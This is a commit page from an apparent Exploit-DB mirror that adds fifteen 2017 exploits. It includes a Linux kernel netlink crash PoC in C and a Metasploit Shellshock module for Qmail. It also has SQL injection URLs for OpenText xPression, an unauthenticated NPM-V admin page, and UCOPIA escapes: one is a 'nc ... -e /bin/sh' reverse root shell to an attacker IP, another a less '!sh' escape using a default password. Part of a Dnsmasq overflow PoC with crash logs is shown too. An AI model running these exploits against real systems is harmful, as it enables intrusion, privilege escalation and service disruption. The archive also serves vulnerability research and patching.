bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-10-03

Browse source 
15 new exploits

Linux Kernel < 4.14.rc3  - Local Denial of Service
Dnsmasq < 2.78 - 2-byte Heap-Based Overflow
Dnsmasq < 2.78 - Heap-Based Overflow
Dnsmasq < 2.78 - Stack-Based Overflow
Dnsmasq < 2.78 - Information Leak
Dnsmasq < 2.78 - Lack of free() Denial of Service
Dnsmasq < 2.78 - Integer Underflow
UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape

Qmail SMTP - Bash Environment Variable Injection (Metasploit)
NPM-V (Network Power Manager) 2.4.1 - Password Reset
phpCollab 2.5.1 - Arbitrary File Upload
phpCollab 2.5.1 - SQL Injection
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection
OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection
This commit is contained in:
Offensive Security 2017-10-03 05:01:26 +00:00
parent 38a6cf0b56
commit ecfeb57577
16 changed files with 1578 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -5690,6 +5690,13 @@ id,file,description,date,author,platform,type,port
42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
42920,platforms/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos,0
42932,platforms/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",linux,dos,0
42941,platforms/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
42942,platforms/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
42943,platforms/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
42944,platforms/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos,0
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9264,6 +9271,8 @@ id,file,description,date,author,platform,type,port
42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15870,6 +15879,7 @@ id,file,description,date,author,platform,type,port
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38610,3 +38620,8 @@ id,file,description,date,author,platform,type,port
42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
42927,platforms/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps,0
42931,platforms/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps,0
42933,platforms/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",hardware,webapps,0
42934,platforms/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,php,webapps,0
42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0
42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0

Can't render this file because it is too large.

29
platforms/hardware/webapps/42933.txt Executable file
View file

@ -0,0 +1,29 @@
NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NPM-V
Affected Version : 2.4.1 and below
Vendor : http://www.china-clever.com
Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
Date: 2017 Sep 25
Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
[*] NPM Introduction:
The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
controlling and managements to many equipments in the rack cabinet of data center all over the world through
LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
or SNMP
[*] Vulnerability Details:
Based on security Check on this device , Authentication doesn't check on Device Admin Console
an attacker can access to management console pages directly and without authentication.
All files in these directories are directly accessible . /log/ /chart /device and /user .
[*] PoC:
An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
http://[Device IP]/user/user.html
#EOF

62
platforms/jsp/webapps/42939.txt Executable file
View file

@ -0,0 +1,62 @@
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
Results in the following error in response:
HTTP/1.1 200 OK
[...]
<b>Errors:&nbsp;</b>
See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl

37
platforms/jsp/webapps/42940.txt Executable file
View file

@ -0,0 +1,37 @@
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
^
Results can be retrieved using blind SQL injection method.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl

145
platforms/linux/dos/42932.c Executable file
View file

@ -0,0 +1,145 @@
# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
# Date: 2017-Oct-02
# Exploit Author: Wang Chenyu (Nanyang Technological University)
# Version:Linux kernel 4-14-rc1
# Tested on:Ubuntu 16.04 desktop amd64
# CVE : CVE-2017-14489
# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
discovered by Syzkaller. Provided for legal security research and testing
purposes ONLY.
In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
nlh->nlmsg_len.
POC:
#include <sys/socket.h>
#include <linux/netlink.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define NETLINK_USER 31
#define MAX_PAYLOAD 1024 /* maximum payload size*/
struct sockaddr_nl src_addr, dest_addr;
struct nlmsghdr *nlh = NULL;
struct iovec iov;
int sock_fd;
struct msghdr msg;
int main()
{
sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
if(sock_fd<0)
return -1;
memset(&src_addr, 0, sizeof(src_addr));
src_addr.nl_family = AF_NETLINK;
src_addr.nl_pid = getpid(); /* self pid */
bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.nl_family = AF_NETLINK;
dest_addr.nl_pid = 0; /* For Linux Kernel */
dest_addr.nl_groups = 0; /* unicast */
nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
nlh->nlmsg_len = 0xac;
nlh->nlmsg_pid = getpid();
nlh->nlmsg_flags = 0;
strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
iov.iov_base = (void *)nlh;
iov.iov_len = 0xc0;
msg.msg_name = (void *)&dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
printf("Sending message to kernel\n");
sendmsg(sock_fd,&msg,0);
printf("Waiting for message from kernel\n");
/* Read message from kernel */
recvmsg(sock_fd, &msg, 0);
printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
close(sock_fd);
}
Crash info:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at
0000000000000028
[ 17.881586] IP: skb_release_data+0x77/0x110
[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
[ 17.882743] Oops: 0002 [#1] SMP
[ 17.883123] Modules linked in:
[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110
[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
ffffffff820f96a0
[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
000000000000000c
[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
ffffc90000e13ad8
[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
0000000000000000
[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
0000000000000000
[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
knlGS:0000000000000000
[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
00000000000006e0
[ 17.892629] Call Trace:
[ 17.892833] skb_release_all+0x1f/0x30
[ 17.893140] consume_skb+0x27/0x90
[ 17.893418] netlink_unicast+0x16a/0x210
[ 17.893735] netlink_sendmsg+0x2a3/0x390
[ 17.894050] sock_sendmsg+0x33/0x40
[ 17.894336] ___sys_sendmsg+0x29e/0x2b0
[ 17.894650] ? __wake_up_common_lock+0x7a/0x90
[ 17.895009] ? __wake_up+0xe/0x10
[ 17.895280] ? tty_write_unlock+0x2c/0x30
[ 17.895606] ? tty_ldisc_deref+0x11/0x20
[ 17.895925] ? n_tty_open+0xd0/0xd0
[ 17.896211] ? __vfs_write+0x23/0x130
[ 17.896512] __sys_sendmsg+0x40/0x70
[ 17.896805] ? __sys_sendmsg+0x40/0x70
[ 17.897133] SyS_sendmsg+0xd/0x20
[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94
[ 17.897783] RIP: 0033:0x7f7614886320
[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
000000000000002e
[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
00007f7614886320
[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
0000000000000003
[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
0000000000000000
[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
0000000000400b9e
[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
0000000000400b9e
[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
[ 17.903689] CR2: 0000000000000028
[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
Reference:
[1] https://patchwork.kernel.org/patch/9923803/
[2] https://github.com/google/syzkaller

79
platforms/linux/local/42936.txt Executable file
View file

@ -0,0 +1,79 @@
# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
## Asset description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
CHROOT escape and privileges escalation.
**Threat**
Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
**CVE ID**: CVE-2017-11322
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 8.2 (High)
**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: chroot escape / privileges escalation
The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
```
$ chroothole_client '/usr/sbin/status'
is not running ... failed !
$ chroothole_client '/usr/sbin/status $(which nc)'
/bin/nc is not running ... failed!
$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
```
Attacker terminal :
```
$ ncat -lvp 4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.1:49156.
whoami
root
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream

90
platforms/linux/local/42937.txt Executable file
View file

@ -0,0 +1,90 @@
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
## Asset Description
UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
The affected asset in this report is a WiFi management appliance.
## Vulnerability
Shell Escape via `less` command.
**Threat**
Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
**CVE ID**: CVE-2017-11321
**Access Vector**: network
**Security Risk**: critical
**Vulnerability**: CWE-78
**CVSS Base Score**: 9.1 (Critical)
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept: Restricted Shell Escape
By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
A documented **admin** user exists on the system with the password **bhu85tgb**.
Quoted from the documentation :
> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.
By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
Steps :
**1/** Login to the appliance using SSH or ShellInTheBox.
**2/** Run the `less /etc/passwd` command.
**3/** When viewing the file, type `!sh`
**4/** You now have unrestricted `admin` user access to the appliance.
```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```
## Solution
Update to UCOPIA 5.1.8
## Timeline (dd/mm/yyyy)
* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream

109
platforms/linux/remote/42938.rb Executable file
View file

@ -0,0 +1,109 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Smtp
def initialize(info={})
super(update_info(info,
'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO field (usually admin@exampledomain.com).
The exploit does not work on the "qmailrocks" community version
as it ensures the MAILFROM field is well-formed.
},
'Author' =>
[
'Mario Ledo (Metasploit module)',
'Gabriel Follon (Metasploit module)',
'Kyle George (Vulnerability discovery)'
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'References' =>
[
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
['URL', 'https://lists.gt.net/qmail/users/138578']
],
'Payload' =>
{
'BadChars' => "\x3e",
'Space' => 888,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby python'
# telnet ruby python and perl works only if installed on target
}
},
'Targets' => [ [ 'Automatic', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'
))
deregister_options('MAILFROM')
end
def smtp_send(data = nil)
begin
result = ''
code = 0
sock.put("#{data}")
result = sock.get_once
result.chomp! if (result)
code = result[0..2].to_i if result
return result, code
rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
return result, 0
rescue ::Exception => e
print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
return nil, 0
end
end
def exploit
to = datastore['MAILTO']
connect
result = smtp_send("HELO localhost\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status('Sending the payload...')
result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status("Sending RCPT TO #{to}")
result = smtp_send("rcpt to:<#{to}>\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n")
if result[1] < 200 || result[1] > 354
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
disconnect
end
end

205
platforms/multiple/dos/42941.py Executable file
View file

@ -0,0 +1,205 @@
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal lets launch attacker controlled DNS server:
# python poc.py 127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal lets launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache
4) Lets fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
WRITE of size 1 at 0x62200001dd0b thread T0
#0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
#1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
#2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
#3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
Shadow bytes around the buggy address:
0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1159==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
